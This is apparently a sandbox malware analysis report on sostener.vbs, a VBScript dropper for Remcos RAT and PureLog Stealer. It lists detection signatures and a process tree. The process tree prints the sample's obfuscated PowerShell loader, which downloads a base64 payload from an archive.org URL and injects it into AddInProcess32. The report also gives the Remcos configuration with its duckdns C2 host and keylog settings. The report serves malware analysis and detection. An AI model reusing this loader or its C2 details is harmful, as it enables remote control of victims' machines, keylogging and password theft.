Edit tour
Windows
Analysis Report
sostener.vbs
Overview
General Information
Detection
Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4780 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\soste ner.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2784 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoKGdldC 1WQVJJQWJM ZSAnKk1Eci onKS5OYU1l WzMsMTEsMl 0tSm9Jbicn KSAoKCgnaz gnKydmdScr J3InKydsID 0gYzlJaHR0 cHM6Ly9pYS crJzYwMDEw MC51cy4nKy dhJysncmNo aXZlJysnLm 9yZy8yNC9p dGVtcy9kZX RhaC1ub3Rl LXYvRGV0YS crJ2hOb3Rl Vi50eHRjJy snOUk7azhm YicrJ2FzJy snZTY0Q29u dCcrJ2VudC A9ICcrJyhO JysnZXctTy crJ2JqZWN0 JysnIFN5c3 RlbScrJy5O ZXQuV2ViQ2 xpZW50KS4n KydEb3dubG 9hZCcrJ1N0 JysncmluJy snZyhrOGZ1 cmwpJysnO2 snKyc4ZmJp bmEnKydyeU MnKydvbnRl bnQgPScrJy BbJysnU3kn KydzdGVtLk MnKydvbnYn KydlJysncn RdOicrJzpG cm9tQmFzZS crJzY0U3Ry aW5nKGs4Zm Jhc2U2NEMn KydvbnQnKy dlbnQnKycp O2s4ZmFzc2 VtYmx5ID0g WycrJ1JlZm xlY3Rpb24u QXNzZW1ibH ldJysnOjon KydMb2FkKC crJ2s4Zicr J2JpbmFyeU NvbnQnKydl bnQpO2s4Zi crJ3R5cGUg JysnPScrJy BrOGZhc3Nl bScrJ2JsJy sneS4nKydH ZXRUeXAnKy dlJysnKGM5 JysnSVJ1bl BFLkgnKydv bWVjOUkpOy crJ2s4Zicr J21ldGhvZC A9ICcrJ2sn Kyc4ZnR5cG UnKycuR2V0 TWV0JysnaG 9kKGM5SVZB SWM5SSk7Jy snazhmbWV0 aG9kLkludi crJ29rZShr OGZudWxsLC crJyBbb2In KydqZScrJ2 N0W11dQChj OUkwL29Tc2 tXL2QvZWUu JysnZScrJ3 RzYXAvLycr JzpzcHR0aG M5SSAsJysn IGM5JysnSW QnKydlcycr J2F0aXYnKy dhZCcrJ29j OUknKycgJy snLCBjOUkn KydkZXNhdG knKyd2YWRv YzknKydJIC wgYzknKydJ ZGVzJysnYX RpdmFkb2M5 SSxjJysnOU lBZGRJblBy b2Nlc3MzMm M5SSxjOUlj OUkpJysnKS cpICAtY1JF cGxBQ0UgKF tDSGFSXTk5 K1tDSGFSXT U3K1tDSGFS XTczKSxbQ0 hhUl0zOSAg LXJFcExBY0 UnazhmJyxb Q0hhUl0zNi kgKQ==';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6784 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ((g et-VARIAbL e '*MDr*') .NaMe[3,11 ,2]-JoIn'' ) ((('k8'+ 'fu'+'r'+' l = c9Ihtt ps://ia'+' 600100.us. '+'a'+'rch ive'+'.org /24/items/ detah-note -v/Deta'+' hNoteV.txt c'+'9I;k8f b'+'as'+'e 64Cont'+'e nt = '+'(N '+'ew-O'+' bject'+' S ystem'+'.N et.WebClie nt).'+'Dow nload'+'St '+'rin'+'g (k8furl)'+ ';k'+'8fbi na'+'ryC'+ 'ontent =' +' ['+'Sy' +'stem.C'+ 'onv'+'e'+ 'rt]:'+':F romBase'+' 64String(k 8fbase64C' +'ont'+'en t'+');k8fa ssembly = ['+'Reflec tion.Assem bly]'+'::' +'Load('+' k8f'+'bina ryCont'+'e nt);k8f'+' type '+'=' +' k8fasse m'+'bl'+'y .'+'GetTyp '+'e'+'(c9 '+'IRunPE. H'+'omec9I );'+'k8f'+ 'method = '+'k'+'8ft ype'+'.Get Met'+'hod( c9IVAIc9I) ;'+'k8fmet hod.Inv'+' oke(k8fnul l,'+' [ob' +'je'+'ct[ ]]@(c9I0/o SskW/d/ee. '+'e'+'tsa p//'+':spt thc9I ,'+' c9'+'Id'+ 'es'+'ativ '+'ad'+'oc 9I'+' '+', c9I'+'des ati'+'vado c9'+'I , c 9'+'Ides'+ 'ativadoc9 I,c'+'9IAd dInProcess 32c9I,c9Ic 9I)'+')') -cREplACE ([CHaR]99+ [CHaR]57+[ CHaR]73),[ CHaR]39 -r EpLAcE'k8f ',[CHaR]36 ) )" MD5: 04029E121A0CFA5991749937DD22A1D9) - AddInProcess32.exe (PID: 3200 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 1836 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 4188 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Version": "4.9.4 Pro", "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0", "Assigned name": "Matrix Fenix*", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-XDNGQ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
Click to see the 17 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
Click to see the 18 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |